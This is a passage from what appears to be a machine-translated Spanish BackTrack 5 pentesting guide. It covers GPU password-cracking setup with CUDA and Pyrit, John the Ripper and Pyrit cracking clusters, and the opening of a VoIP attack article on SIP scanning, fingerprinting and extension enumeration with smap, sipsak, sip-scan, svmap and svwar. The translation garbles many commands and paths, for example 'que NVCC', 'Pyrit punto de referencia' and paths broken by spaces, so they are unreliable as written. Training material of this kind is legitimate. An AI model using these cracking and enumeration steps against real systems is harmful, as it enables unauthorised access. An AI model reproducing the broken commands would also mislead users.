ser utilizado por el 100% de clonacin precisa (incluso UID), i una vez puede escribir acerca de la
segunda edicin c00king con Mifare Classic y Prox HID ...
Armado con BackTrack GSM ataque suite?

0x08 - Gracias
Este libro de cocina fue hecha con gran ayuda de los chicos h4f, muchas gracias a Vulcano y Atrs.

0x09 - Referencias y enlaces


Para leer ms acerca de este tema, por favor vea lo siguiente:

http://www.cs.virginia.edu/ ~ kn5f/pdf/K.Nohl.PhD Implementable.Privacy.for.RFID.Systems.pdf


http://events.ccc.de/congress/2007/Fahrplan/events/2378.en.html
http://packetstorm.rlz.cl/papers/wireless/2008-esorics.pdf
http://www.nethemba.com/mifare-classic-slides.pdf
http://code.google.com/p/nfc-tools/wiki/mfoc

0x0A - Acerca de
MI1 es un "entusiasta plena seguridad tiempo" con ttulo universitario en el campo de la informtica.
Recientemente centrando su pasin por cosas USRP y RFID.

Privilege Escalation

CUDA en BackTrack 5

CUDA en BackTrack 5

Esta gua es un trabajo en progreso, y est diseada para ayudar a aquellos que necesitan obtener CUDA
trabajando en sus mquinas inversas.
Comience por la preparacin de sus fuentes del ncleo para la instalacin del controlador Nvidia:
root @ bt: ~ # preparar-kernel-sources
root @ bt: ~ # cd / usr / src / linux
root @ bt: ~ # cp-rf include / genera / * include / linux /

Descargar drivers de Nvidia de acuerdo con la arquitectura de CPU:


32
64
Asegrese de que no est en una sesin X (cerrar la sesin a la consola), y ejecutar el instalador del

controlador Nvidia.
A continuacin, descargue el kit de herramientas CUDA, de acuerdo con la arquitectura de CPU:
32
64
Lo ideal es instalar el kit de herramientas CUDA en / opt. esta gua se presupone esta ruta de instalacin.
Configurar las variables de entorno para que el comando NVCC funciona. Usted puede hacer esto
aadiendo las siguientes lneas en el archivo / root / .bashrc archivo:
PATH = $ PATH :/ opt / cuda / bin
LD_LIBRARY_PATH = $ LD_LIBRARY_PATH :/ opt / cuda / lib
export PATH
export LD_LIBRARY_PATH

A continuacin, ejecute:
root @ bt: ~ # source / root / .bashrc
root @ bt: ~ # ldconfig

El propsito de esto era conseguir compilador NVCC instalado. Usted puede comprobar que todo est
configurado correctamente:
root @ bt: ~ # que NVCC
/ Opt / cuda / bin / NVCC
root @ bt: ~ # NVCC-V
NVCC: NVIDIA (R) Cuda conductor compilador
Copyright (c) 2005-2011 NVIDIA Corporation
Construido sobre Sun_Mar_20_16: 45:27 _PDT_2011
Cuda herramientas de compilacin, versin 4.0, V0.2.1221
root @ bt: ~ #

Ahora que el controlador de Nvidia CUDA y kit de herramientas se instalan, podemos probar su
funcionalidad con una herramienta GPU potencia, como Pyrit.
root @ bt: ~ # svn checkout http://pyrit.googlecode.com/svn/trunk/ Pyrit
root @ bt: ~ # cd Pyrit / Pyrit && python setup.py construir && python setup.py install
root @ bt: ~ # cd .. / .. /
root @ bt: ~ # cd Pyrit / cpyrit_cuda && python setup.py construir && python setup.py install

Ejecutar un punto de referencia para ver que todo funciona como se espera:
root @ bt: ~ # Pyrit punto de referencia
Pyrit 0.4.1-dev (svn R308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
Este cdigo se distribuye bajo la v3 Licencia Pblica General GNU +
Punto de referencia en funcionamiento (63.787,8 PMKs / s) ... \
Computarizada 63.787,82 PMKs / s total.
# 1: 'CUDA-Device # 1' GeForce GTX 295: 11558.7 PMKs / s (RTT 3,0)
# 2: "CUDA-Device # 2 'GeForce GTX 295: 10912.5 PMKs / s (RTT 2.9)
# 3: "CUDA-Device # 3 'GeForce GTX 295: 10632.1 PMKs / s (RTT 3,0)
# 4: "CUDA-Device # 4 'GeForce GTX 295: 11654.7 PMKs / s (RTT 2.9)
# 5: "CUDA-Device # 5" GeForce GTX 295: 10868.9 PMKs / s (RTT 2.9)
# 6: "CUDA-Device # 6 'GeForce GTX 295: 10322.8 PMKs / s (RTT 3,0)

# 7: 'CPU Core (SSE2)': 500,7 PMKs / s (RTT 2.7)


# 8: "CPU Core (SSE2) ': 508,9 PMKs / s (RTT 2.8)

xito! Ahora podemos utilizar las herramientas CUDA BackTrack impulsados desde dentro.

JTR grupo

La construccin de un Juan el destripador Cluster en


Backtrack5 R2 y R3
En este tutorial vamos a crear un grupo que nos va a ayudar en la formacin de grietas hashes con
John the Ripper.
Lo primero que quiero hacer es instalar libssl-dev y MPICH2 despus de que lo configura. (Nota:
secretword debe ser el mismo en cada mquina.)
root @ bt: ~ # apt-get install MPICH2 libssl-dev
root @ bt: ~ # touch / etc / mpd.conf
root @ bt: ~ # chmod 600 / etc / mpd.conf
root @ bt: ~ # echo "secretword = bt" >> / etc / mpd.conf
root @ bt: ~ # touch mpd.hosts
root @ bt: ~ # echo "192.168.1.69:1" mpd.hosts >>
root @ bt: ~ # chmod 600 mpd.hosts
root @ bt: ~ # mpdboot
root @ bt: ~ # mpdtrace
bt
root @ bt: ~ # mpdallexit

Ahora instale la versin de la MPI de John the Ripper.


root @ bt: ~ / Desktop # wget http://www.bindshell.net/tools/johntheripper/john-1.7.3.1-all-2mpi8.tar.gz
root @ bt: ~ / Desktop # tar xvfz john-1.7.3.1-all-2-mpi8.tar.gz
root @ bt: ~ / Desktop/john-1.7.3.1-all-2-mpi8/src # make clean linux-x86-sse2
root @ bt: ~ # mv-f john-1.7.3.1-all-2-mpi8 pentest / / contraseas / john-mpi

Despus de instalar la versin MPI de John the Ripper configuramos nuestro archivo / etc / hosts.
root @ bt: ~ # nano / etc / hosts
127.0.0.1 localhost
192.168.1.69 servidor
192.168.1.70 nodo1
# Las siguientes lneas son recomendables en equipos que pueden IPv6
:: 1 localhost ip6-localhost loopback ip6fe00 :: 0 ip6-localnet
ff00 :: 0 ip6-mcastprefix
ff02 :: 1 ip6-allnodes

ff02 :: 2 ip6-allrouters
ff02 :: 3 ip6-allhosts

NOTA: Haga exactamente lo mismo en el cliente.


Una vez que tenemos el servidor y la configuracin del cliente es el momento para que nuestro
servidor SSH y transferir los archivos de configuracin desde el servidor al cliente.
root @ bt: ~ # ssh root@192.168.1.70 mkdir-p / root / .ssh
root @ bt: ~ # cat / root / .ssh / id_rsa.pub | ssh root@192.168.1.70 'cat >> .ssh / authorized_keys'
root @ bt: ~ # scp / root / mpd.hosts root@192.168.1.70 :/ root /
root @ bt: ~ # scp / etc / mpd.conf root@192.168.1.70 :/ etc /
root @ bt: ~ # scp / etc / hosts root@192.168.1.70 :/ etc /

Si partimos del cluster deberamos ver nuestro servidor y el cliente.


root @ bt: ~ # mpdboot-v - file = / root / mpd.hosts-n 2
mpdallexit en marcha bt
LANZAMIENTO mpd en bt va
DURACIN mpd en bt
LANZAMIENTO mpd en 192.168.1.70 a travs bt2
DURACIN mpd en 192.168.1.70
root @ bt: ~ # mpdtrace
bt
bt2

Ahora vamos a probar nuestra agrupacin.


root @ bt: ~ # echo "admin: 21232f297a57a5a743894a0e4a801fc3"> / root / prueba
root @ bt: ~ # scp / root / prueba root@192.168.1.70 root :/ /
root @ bt: ~ # mpiexec-host 192.168.1.69-np 2 / pentest / passwords / john-mpi / run / john Formato: raw-MD5 / root / prueba
Cargado un hash de la contrasea (Raw MD5 [prima-md5])
admin (admin)
admin (admin)
Tema: 1 suposiciones: 1 hora: 0:00:00:00 100% (1) c / s: 160 intentar: admin - Adminis
Tema: adivina 0: 1 hora: 0:00:00:00 100% (1) c / s: 133 intentando: admin - admins

Pyrit grupo

La construccin de un Cluster Pyrit Backtrack5 R2 y R3


En este tutorial vamos a crear un clster en Backtrack5 R2 mediante Pyrit.
Pyrit viene instalado por defecto en Backtrack5 R2. Si lo ha eliminado, slo tiene que utilizar aptget install para instalarlo.
El primer paso para crear un grupo Pyrit es crear un archivo de configuracin.
root @ bt:. ~ # mkdir ~ / Pyrit

root @ bt: ~ # nano ~ / .pyrit / config


root @ bt: ~ # cat ~ / .pyrit / config
default_storage = file :/ /
limit_ncpus = 0
rpc_announce = true
rpc_announce_broadcast = false
rpc_knownclients = 192.168.1.69 (Esta es la IP de los servidores)
rpc_server = true
workunit_size = 75000

Despus de tener el archivo de configuracin anterior en todas nuestras mquinas, se inicia el


servidor.
root @ bt: ~ # Pyrit servir

Ahora, desde que el cliente debe ser capaz de ver ambos ncleos.
NOTA: El comando Pyrit list_cores tiene un error que cuando se utiliza el servidor se bloquee.

Podemos probar nuestro cmulo de nueva construccin con opcin de punto de referencia Pyrit.
root @ bt: ~ # Pyrit punto de referencia

Si cambiar al servidor mientras se ejecuta el punto de referencia, se puede ver que en la actualidad
uno cliente est conectado.

Voz sobre IP

Pentesting VoIP con BackTrack

Pentesting VOIP

Este artculo fue contribuido por NightRang3r.


URL: http://www.back-track.de/index.php?page=team # SMTX
Twitter: ! http://twitter.com/ # / NightRang3r
Email: shai@exploit.co.il

Contenido
[hide]
1 Pruebas
de
Penetraci
n con
BackTrack
VOIP
2 Tpico
VoIP
Topologas
2,1
Self
Hos
ted
2,2
Hos
ted
Ser
vic
es
2.3
Ser
vici
o
Onl
ine
SIP
3
Fundament
os SIP
3.1
Las
soli
citu
des
SIP
/
Mt
odo
s

3
3.2
Las
res

Pruebas de Penetracin con BackTrack VOIP


VoIP es una tecnologa fascinante que ofrece muchos beneficios y soluciones rentables para la
comunicacin. Cada vez ms las pequeas empresas y las empresas estn reemplazando sus viejos
sistemas de telefona tradicionales con un sin basados en IP. Una PBX VoIP basado puede proporcionar
muchas caractersticas, tales como: varias extensiones, identificador de llamadas, correo de voz, IVR,
capacidades de grabacin de conversaciones, registro, uso con telfonos basados en hardware o software
de base (tambin conocidos como telfonos de software). Hoy en da hay muchos proveedores de PBX,
telfonos IP, servicios de VoIP y equipos tales como: Cisco, Avaya y Asterisk, SNOM, THOMSON ...
Con la nueva tecnologa viene un nuevo reto, tanto para la parte defensiva y ofensiva de la seguridad, uno
de los " grandes "peligros de las lneas telefnicas tradicionales es que es susceptible a intrusos. La
"escuela vieja" manera de interceptar la lnea telefnica de alguien era conectar fsicamente un pequeo
transmisor que se conecta dentro o fuera de sus instalaciones en alguna parte a lo largo del cable de
telfono.

Sistemas de telefona IP tambin son susceptibles a la escucha, hacerlo en un entorno IP es un poco ms


difcil de ejecutar, detectar y requieren ms los conocimientos y el conjunto adecuado de herramientas.
En este artculo no vamos a hablar de un proveedor en particular o de la tcnica, pero vamos a echar un
vistazo a los conceptos y las herramientas disponibles para atacar a nuestra disposicin VoIP en
Backtrack Linux. El objetivo principal de este artculo es presentar las herramientas y su uso con el fin
de ayudarle a elegir la herramienta adecuada para la situacin correcta. Vamos a examinar algunos
vectores de ataque del mundo real y descubrir cmo BackTrack puede ayudarnos pentesting VoIP,
tambin vamos a examinar algunas de las herramientas que se presentan en BackTrack y su uso.

Tpico VoIP Topologas


Hay varias maneras se puede telefona basada en IP implementadas, estas son algunas topologas
comunes y su uso:

Auto Hosted
Una PBX (ie Asterisk) est instalado en el sitio del cliente y conectado a un ISP o proveedor de servicios
de telefona PSTN a travs de una troncal SIP / PRI, el trfico de VoIP fluye a travs de una VLAN
dedicada.
Visio diagrama de Amir Avraham

Servicios de Alojamiento
No hay necesidad de un PBX en el sitio. Slo un switch, un router, telfonos IP y una conexin a la
central a travs de proveedor de servicios de Internet o IP / VPN conexin, cada telfono se configura con
informacin de la cuenta SIP.

Servicio en lnea SIP


Servicios como sipme.me proporciona una aplicacin para PC o los telfonos inteligentes y una cuenta
gratuita sorbo, que ofrece precios ms bajos para las llamadas internacionales y las llamadas gratuitas
entre los usuarios de los servicios mediante la asignacin de un nmero de telfono mvil a cada
suscriptor.

SIP Basics
El SIP (Session Initiation Protocol) papel es configurar, cancelar o modificar una voz o una videollamada
concentrndose la voz y / o el trfico de video soportado por un protocolo como RTP (Protocolo de
transporte en tiempo real). SIP es un protocolo de capa de aplicacin que utiliza UDP para el transporte
(TCP y SCTP se puede utilizar tambin).
SIP normalmente utiliza los puertos 5060 TCP o UDP para sealizacin cifrada o 5061
para el transporte cifrado mediante TLS.
SIP es un protocolo basado en ASCII que tiene algunos elementos similares, como en el protocolo HTTP
utilizando una peticin / respuesta modelo. Al igual que una peticin HTTP de un navegador de una
solicitud de cliente SIP se realiza mediante un URI SIP un agente de usuario y un mtodo / solicitud. SIP
utiliza el correo electrnico como formato de direcciones: user / telfono @ dominio / IP es un tpico
URI SIP se ve as:
sip: 205@192.168.1.100, sip: username@pbx.com, sip: 205@192.168.1.100: 5060

De acuerdo con la solicitud presentada por el cliente ser recibido una respuesta con un cdigo de estado
o de error, las tablas siguientes se describen las peticiones y las respuestas disponibles en el protocolo
SIP.

Pide SIP / Mtodos


Solicitar
INVITAN
ACK
CANCELAR
REGISTRO
OPCIONES
BYE

Descripcin
Se utiliza para invitar y dar cuenta de participar en una sesin de llamada.
Acusar recibo de una peticin INVITE.
Cancelar una solicitud pendiente.
Registrar el usuario con un servidor SIP.
Muestra informacin acerca de las capacidades de una persona que llama.
Termina una sesin entre dos usuarios en una llamada.
Indica que el destinatario (identificado por la URI de la solicitud)

CONSULTE

debe contactar a un tercero que utilice la informacin de contacto


proporcionado en la solicitud.

SUSCRBETE El mtodo SUBSCRIBE se utiliza para solicitar el estado actual y

actualizaciones de estado de un mando a distancia


nodo.
El mtodo NOTIFY se utiliza para notificar a un nodo SIP que un evento
NOTIFICAR

que ha sido solicitada por un mtodo anterior tiene SUBSCRIBE


ocurrido.

Un ejemplo SIP "INVITE" Solicitud:


INVITAN SIP: 201@192.168.1.104 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.102; rport; sucursal = z9hG4bKvbxaoqar
Max-Delanteros: 70
A:
De: "NightRanger" ; Tag = eihgg
Call-ID: hfxsabthoymshub @ retroceder
CSeq: 649 INVITE
Contacto:
Content-Type: application / sdp
Allow: INVITE, ACK, BYE, CANCEL, OPTIONS, PRACK, CONSULTE, NOTIFY, SUBSCRIBE, INFO, MESSAGE
Soportados: sustituye, norefersub, 100rel
User-Agent: Twinkle/1.2
Content-Length: 310

SIP Respuestas
Respuesta
1xx

Descripcin
Respuestas informativos, solicitud recibida y ser
procesada.
Respuestas exitosas La accin fue recibida con xito,

2xx
3xx
4xx
5xx

comprendido y aceptado.
Respuestas de redireccin
Solicitar respuestas fracaso de la peticin es sintcticamente incorrecta o
no se pueden cumplir en el servidor.
Las respuestas del servidor falla, el servidor incumplido una de las

aparentemente solicitud vlida.


Respuestas globales fracaso de la solicitud no puede cumplirse en cualquier
6xx

servidor.

Un ejemplo SIP "Trying" Respuesta:


Tratando SIP/2.0 100
Via: SIP/2.0/UDP 192.168.1.102; sucursal = z9hG4bKpmphujka, recibido = 192.168.1.102; rport =
5060
De: "NIghtRanger" ; Tag = eihgg
A:
Call-ID: hfxsabthoymshub @ retroceder
CSeq: 650 INVITE
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, CONSULTE, suscribir, NOTIFIQUE
Compatible con: sustituye
Contacto:
Content-Length: 0

SIP llamada entre dos telfonos Ejemplo

El telfono que llama enva una invitacin.


El telfono llamado devuelve una respuesta de 100 (Tratar).
El telfono llamado entonces comienza a sonar y enva una respuesta de 180 (Ringing).
Cuando la persona toma el telfono el telfono llama enva una respuesta de 200 (OK).
El telfono que llama enva una respuesta ACK.
La conversacin se inicia a travs de RTP.
Cuando la persona que llama cuelga el telfono una peticin BYE es enviada.
El telfono que llama responde con 200 (OK).

De ataque
Antes de empezar con las herramientas que vamos a echar un vistazo a algunos tipos de ataque comunes
VoIP:
Recopilacin de informacin, Huella y recuento.

Seguimiento de llamadas de trfico y escuchas telefnicas.


Atacar autenticacin.
VLAN salto.
Denegacin de servicio / Inundaciones.
Suplantacin de identificacin de llamadas.
Con el fin de probar las herramientas que ha configurado un sistema de Trixbox PBX y creado 6
extensiones. Me va a utilizar dos telfonos de software, es un cliente basado en Linux llamado Twinkle y
el segundo es un cliente basado en Windows llamado X-Lite. Me va a utilizar la versin ltima y ms
grande de Backtrack Linux que es R2. Usted puede encontrar la mayora de las herramientas de ataque
de VoIP en Backtrack bajo el directorio "/ pentest / voip /" directorio:
root @ bt: ~ # cd / pentest / voip /
root @ bt :/ pentest / voip #

O simplemente puede navegar a travs del men de KDE para el "Backtrack" "Voz sobre IP" submens:

Recopilacin de informacin
Esta fase es donde nos reunimos informacin acerca de la topologa, servidores y clientes para obtener
informacin tanto como podamos a fin de lanzar un ataque exitoso. Lo que nos interesa es la bsqueda de
hospederos vivos, el tipo y la versin PBX, servidores VoIP / gateways, clientes (hardware y software) los
tipos y versiones, etc ... En vez de enumerar los nombres de usuario "" vamos a enumerar las extensiones
SIP. Echemos un vistazo a algunas de las herramientas disponibles en Backtrack que nos ayuden a
encontrar, identificar y enumerar los dispositivos de VoIP habilitadas.

SMAP
Backtrack incluye una gran herramienta llamada SMAP, que es un escner simple para dispositivos con
capacidad SIP SMAP enva de varias solicitudes SIP en espera de respuestas de SIP habilitado router
DSL, apoderados y agentes de usuario.
Se podra considerar un mash up de NMAP y SIPSAK.
SMAP uso:
root @ bt :/ pentest / VoIP / SMAP #. / SMAP
SMAP 0.6.0 http://www.wormulon.net/
uso: SMAP [Opciones]
-H: esta ayuda
-D: aumentar la depuracin
-O: activar huellas dactilares

-O: permitir una mayor toma de huellas dactilares detallado


-L: el modo de aprendizaje de huellas dactilares
-T: transporte TCP
-U: transporte UDP (por defecto
-P0: Tratar a todos los hosts en Internet - skip anfitrin descubrimiento
-P : Puerto de destino
-R : Mensajes al lmite de velocidad de segundo
-D : Dominio SIP para usar sin provocar sip:
-W : Tiempo de espera en milisegundos

Escaneado de un nico host:


root @ bt :/ pentest / VoIP / SMAP #. / SMAP 192.168.1.104
SMAP 0.6.0 http://www.wormulon.net/
192.168.1.104: accesible ICMP, SIP habilitado
1 host escaneado, 1 alcanzable ICMP, 1 con capacidad SIP (100,0%)

Escaneado de un rango de direcciones IP:


root @ bt :/ pentest / VoIP / SMAP #. / 192.168.1.130/24 SMAP
SMAP 0.6.0 http://www.wormulon.net/
192.168.1.20: accesible ICMP, SIP habilitado
192.168.1.22: accesible ICMP, SIP habilitado
192.168.1.0: ICMP inalcanzable, SIP desactivado
192.168.1.1: ICMP inalcanzable, SIP desactivado
192.168.1.2: ICMP inalcanzable, SIP desactivado
192.168.1.3: ICMP inalcanzable, SIP desactivado
---- EDIT --192.168.1.250: ICMP inalcanzable, SIP desactivado
192.168.1.251: ICMP inalcanzable, SIP desactivado
192.168.1.252: ICMP inalcanzable, SIP desactivado
192.168.1.253: ICMP inalcanzable, SIP desactivado
192.168.1.254: ICMP inalcanzable, SIP desactivado
192.168.1.255: ICMP inalcanzable, SIP desactivado
256 hosts escaneados, 7 alcanzables ICMP, 2 con capacidad SIP (0,8%)

Ahora que hemos identificado a los anfitriones con capacidad SIP podemos utilizar SMAP de la huella
digital del tipo cliente / servidor y versin:
root @ bt :/ pentest / VoIP / SMAP #. / SMAP-O 192.168.1.104
SMAP 0.6.0 http://www.wormulon.net/

192.168.1.104: accesible ICMP, SIP habilitado


mejor estimacin (70% seguro) huella digital:
Asterisk PBX SVN-r56579 troncoUser-Agent: Asterisk PBX
1 host escaneado, 1 alcanzable ICMP, 1 con capacidad SIP (100,0%)

En el caso de SMAP no poda nuestra huella anfitrin se utiliza el argumento-l para ponerlo en modo de
aprendizaje para proporcionar alguna informacin til:
root @ bt :/ pentest / VoIP / SMAP #. / SMAP-l 192.168.1.104
SMAP 0.6.0 http://www.wormulon.net/
AVISO: test_accept: "Accept: application / sdp"
AVISO: test_allow: "Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, CONSULTE, suscribir, NOTIFY"
AVISO: test_supported: "Con el apoyo: sustituye"
AVISO: test_via: capitalizacin de transporte: 2
AVISO: test_via: "sucursal; alias; recibido; rport"
AVISO: test_via: Por favor, aadir cmpstr nuevo
AVISO: test_via: capitalizacin de transporte: 2
192.168.1.104: accesible ICMP, SIP habilitado
mejor estimacin (70% seguro) huella digital:
Asterisk PBX SVN-r56579 troncoHUELLA informacin:
newmethod = 501
accept_class = 2
allow_class = 201
supported_class = 8
via_class = 2
hoe_class = ignorar
options = 200
brokenfromto = 404
PRACK = 481
mesa de ping = 501
invitar = 200
User-Agent: Asterisk PBX
1 host escaneado, 1 alcanzable ICMP, 1 con capacidad SIP (100,0%)

Otra caracterstica til de SMAP es el argumento-d, que permite la salida de depuracin para verbosidad
intenta utilizar el o-junto con l a ver el proceso de toma de huellas dactilares en los detalles.
root @ bt :/ pentest / VoIP / SMAP #. / SMAP-d 192.168.1.104
SMAP 0.6.0 http://www.wormulon.net/
DEBUG:
DEBUG:
DEBUG:
DEBUG:
DEBUG:

IP local: 212.235.66.182
IP local: 212.235.66.182
bind () con xito
RAW socket abierto
pasar de 1 a S_START S_PING

DEBUG: Responder ICMP Echo error


DEBUG: 192.168.1.104 / 1 peticin: solicitud SIP OPTIONS (vlido)
DEBUG: respuesta pertenece a la tarea 1 (192.168.1.104)
DEBUG: ACK: ACK sip: localhost SIP/2.0
Via: SIP/2.0/UDP 212.235.66.182:12345; sucursal = z9hG4bK.56689, alias, recibido =
192.168.1.105; rport = 5060
De: ; Tag = 6b9ae50e67345d3b
A: ; Tag = as14262fec
Call-ID: 1992951560@212.235.66.182
CSeq: ACK 23915
Content-Length: 0
User-Agent: SMAP 0.6.0
--- Fin del ACK 192.168.1.104: accesible ICMP, SIP habilitado
DEBUG: destruir la tarea 1
1 host escaneado, 1 alcanzable ICMP, 1 con capacidad SIP (100,0%)

SIPSAK
SIPSAK se utiliza para probar las aplicaciones habilitadas SIP y dispositivos que utilizan el mtodo de
solicitud nica opcin. Podemos usarlo para huellas digitales y enumeracin. Usted no encontrar
SIPSAK en el directorio "/ pentest / voip /" directorio, se puede ejecutar desde cualquier lugar
simplemente escribiendo SIPSAK.
root @ bt: ~ # SIPSAK SIPSAK 0.9.6 por Nils Ohlmeier Copyright (C) 2002-2004 FhG Fokus Copyright
(C) 2004-2005 Nils, informe de errores a Ohlmeier nils@sipsak.org rodaje: SIPSAK [-f archivo] [- L]-s
SIPURI rastro: SIPSAK-T-s SIPURI usrloc: SIPSAK-U [-I | M] [-b NMERO] [-e NMERO] [-x NMERO] [-z
NMERO]-s SIPURI usrloc: SIPSAK -I | M [-b NMERO] [-e NMERO]-s SIPURI usrloc: SIPSAK-U [-C
SIPURI] [-x NMERO]-s SIPURI mensaje: SIPSAK-M [B-STRING] [-O CADENA] [-c SIPURI]-s SIPURI
inundacin: SIPSAK-F [-e NMERO]-s SIPURI azar: SIPSAK-R [-t NMERO]-s parmetro SIPURI adicional
en todos los modos: [-a CONTRASEA] [-d] [ -i] [-H HOSTNAME] [-l PUERTO] [-m nmero] [-n] [-N] [-r
puerto] [-v] [-V] [-w]-h muestra este mensaje de ayuda - V imprime cadena de versin slo-f file El
archivo que contiene el mensaje de SIP para enviar uso - por nivel de entrada-L desactivar CR (\ r)
insercin en los archivos-s SIPURI la URI del servidor de destino en forma sip: [usuario @]
nombre_servidor [: puerto]-T activa el modo de traceroute-U se activa el modo usrloc-I simula
algunas llamadas exitosas con s mismo-M enva mensajes a s mismo-C SIPURI utilizar el URI como
contacto en REGISTER-b Nmero del apndice nmero inicial de el nombre de usuario (por defecto:
0)-E Nmero de la numer de finalizacin del apndice del nombre de usuario-o nmero de nmero
de dormir ms antes de enviar el siguiente peticin-x NMERO expira el campo de encabezado valor
(por defecto: 15)-z NMERO activa el azar eliminacin de usuario encuadernaciones-F se activa el
modo de inundacin-R activa los modues aleatorios (peligroso)-t Nmero El nmero mximo de
caracteres destrozado en modo aleatorio (por defecto: duracin peticin)-l PORT del puerto local
para usar (por defecto: ninguno) - r El puerto remoto (por defecto: 5060)-p objetivo peticin
HOSTNAME (proxy saliente)-H HOSTNAME sobrescribe el nombre de host local en todo NMERO
headers-m el valor de la cabecera max-forwards campo-n usar FQDN en lugar de direcciones IP en la
Via-Line-i desactivar la insercin de un Via-Line-una contrasea para la autenticacin de contrasea
(si la contrasea se omite = "")-u nombre de usuario de autenticacin STRING-d-v ignorar
redireccionamientos cada v produce ms verbosidad (mx. 3) -w IP extracto de la advertencia en
respuesta-g cadena de reemplazo para una marca especial en la sustitucin mensaje-G activa de las
variables-N devuelve cdigos de salida compatible con Nagios-q Cadena de bsqueda de una

expresin regular en las respuestas y en caso de fallo de error de retorno-W NMERO volver
advertencia Nagios si retransmisin> nmero B-STRING enviar un mensaje con la cadena como
cuerpo-O CADENA Content-Disposition Nmero NMERO valor-P de los procesos de start-A Nmero
Nmero de ejecuciones de pruebas e imprimir slo tiempos-S utilizan un mismo puerto para la
recepcin de y el envo-c SIPURI utilizar el URI como en De MENSAJE-D multiplicador de tiempo de
espera para INVITAR NMERO transacciones y medios de transporte confiables (por defecto: 64)-E
STRING especificar de transporte a utilizar-j STRING agrega cabeceras adicionales a la solicitud

He aqu un ejemplo de uso de SIPSAK a un dispositivo de huella digital con capacidad SIP Podemos ver
en el resultado de que el dispositivo que consulta es un Audiocodes MP-114 gateway FXS.
root @ bt: ~ # SIPSAK-vs-s sip: 192.168.1.221
mensaje recibido:
SIP/2.0 200 OK
Via: SIP/2.0/UDP 127.0.1.1:51601; sucursal = z9hG4bK.18a1b21f; rport, alias
De: sip: sipsak@127.0.1.1: 51601; tag = 97ac9e5
A: sip: 192.168.1.221; tag = 1c1785761661
Call-ID: 159042021@127.0.1.1
CSeq: 1 OPCIONES
Contacto:
Compatible con: em, 100rel, temporizador, sustituye, camino, recursos prioridad Permitir:
REGISTRO, OPTIONS, INVITE, ACK, CANCEL, BYE, notificar, PRACK, CONSULTE, INFO, SUBSCRIBE,
UPDATE servidor:-Audiocodes-SIP-Gateway-MP 114 FXS/v.5.40A.040.005 X-Recursos: telchs = 4/0;
mediachs = 0/0 Accept: application / sdp, application / simple-mensaje-resumen, el mensaje /
sipfrag Content-Type: application / sdp Content- Longitud: 343 v = 0 o = 1785763980 1785763858
AudiocodesGW EN IP4 192.168.1.221 s = Telfono-Call C = EN IP4 192.168.1.221 t = 0 0 = 6000 m
audio RTP / AVP 18 8 0 127 a = rtpmap: 18 G729 / a = 8000 fmtp: 18 annexb = no a = rtpmap: 8
PCMA/8000 a = rtpmap: 0 PCMU/8000 a = rtpmap: 127 telephone-event/8000 a = fmtp: 127 = 0-15
un ptime: 20 a = sendrecv a = RTCP: 6001 EN IP4 192.168.1.221 ** respuesta recibida despus de
67,923 ms ** SIP/2.0 200 OK final recibida

SIPScan
Sip-Scan es un escner simple para saborear hosts habilitados para que pueda escanear un solo host o una
subred completa.
Sip-scan uso:
root @ bt :/ pentest / voip / sipscan # / sip exploracin--. ayudar
. / Sip-scan versin [unknown] llamado Getopt :: std :: getopts (versin 1,05),
funcionando bajo la versin Perl 5.10.0.
Uso: sip-scan [opciones]
-V Ser detallado.
-I ip | si Interface / IP SIP-headers (por defecto: IP desde ppp0)
-P puerto puerto remoto para escanear. (Por defecto: 5060)
-L puerto local origen de los paquetes. (Por defecto: 5060)
-Dn [p] Espere n ms despus de cada paquete enviado (por defecto: 50ms) o si 'p' es
dado, enve n paquetes por segundo (por defecto: 20)
-Wn Wait n ms para las respuestas restantes (por defecto: 2000 ms)

Red de especificaciones contiene el comodn * nm o rangos.

Escaneo de una subred:


root @ bt :/ pentest / voip / sipscan #. / sip-scan-i eth0 192.168.1.1-254
192.168.1.20: Grandstream HT-502 V1.2A 1.0.1.35
192.168.1.21: Grandstream HT-502 V1.2A 1.0.1.35
192.168.1.22: Asterisk PBX
192.168.1.104: Asterisk PBX
192.168.1.128: FreeSWITCH-mod_sofia/1.0.trunk-16055
192.168.1.174: Grandstream HT-502 V1.2A 1.0.1.35
192.168.1.175: Asterisk PBX 1.6.0.9-samy-r27
192.168.1.219: "Exelmind de control de llamada Switch (CCS)"
192.168.1.248: MailVision HostLynx/2.1 'GA'

SVMAP
SVMAP forma parte de un conjunto de herramientas llamado sipvicious y es mi favorito escner de
eleccin Puede ser utilizado para escanear identificar y huella digital de una sola direccin IP o un rango
de direcciones IP. Svmap permite especificar el mtodo de la peticin que est siendo usado para la
digitalizacin, el mtodo predeterminado es OPCIONES, ofrece depuracin y opciones de verbosidad e
incluso permite escanear los registros SRV de SIP en el dominio de destino. Usted puede utilizar el
modificador /. Svmap h-para ver todos los argumentos disponibles
. root @ bt :/ pentest / voip / sipvicious # / svmap.py uso: svmap.py [opciones] host1 host2
hostrange ejemplos: svmap.py 10.0.0.1-10.0.0.255 \> 172.16.131.1 sipvicious.org/22 10,0 ... .1.1/24
\> 1.1.1.1-20 1.1.2-20 * 4.1 * * svmap.py-s session1 - aleatorizar 10.0.0.1 / 8 svmap.py - resume
session1-v svmap.py - p5060-5062-m 10.0.0.3-20 INVITAR

Escaneo de un rango de direcciones IP:


root @ bt :/ pentest / voip / sipvicious #. / svmap.py 192.168.1.1-254
| SIP Device | Agente de usuario | Huella |
-------------------------------------------------- | 192.168.1.104:5060 | Asterisk PBX | disabled |
| 192.168.1.103:5060 | Twinkle/1.4.2 | disabled |

Habilitar exploracin huellas digitales


. root @ bt :/ pentest / voip / sipvicious # / svmap.py 192.168.1.1-254 - fp

Extensiones Enumeracin
Enumeracin de extensin puede ayudar a un atacante mediante la bsqueda de extensiones vlidas en un
sistema de VoIP que luego puede conducir a un ataque de fuerza bruta sobre las cuentas SIP.
Enumeracin obras de ampliacin por los errores que examinan devueltos por los mtodos solicitudes
SIP REGISTER como, opciones y INVITAR
Svwar
Svwar es tambin una herramienta de la suite sipvicious permite enumerar las extensiones utilizando una
gama de extensiones o utilizar un archivo de diccionario svwar apoya todos los de los tres mtodos de
enumeracin de extensin como se ha mencionado anteriormente, el mtodo por defecto para la
enumeracin es registrarse.
Uso:

root @ bt :/ pentest / voip / sipvicious #. / svwar.py


Uso: svwar.py [opciones] destino
ejemplos:
svwar.py-e100-999 10.0.0.1
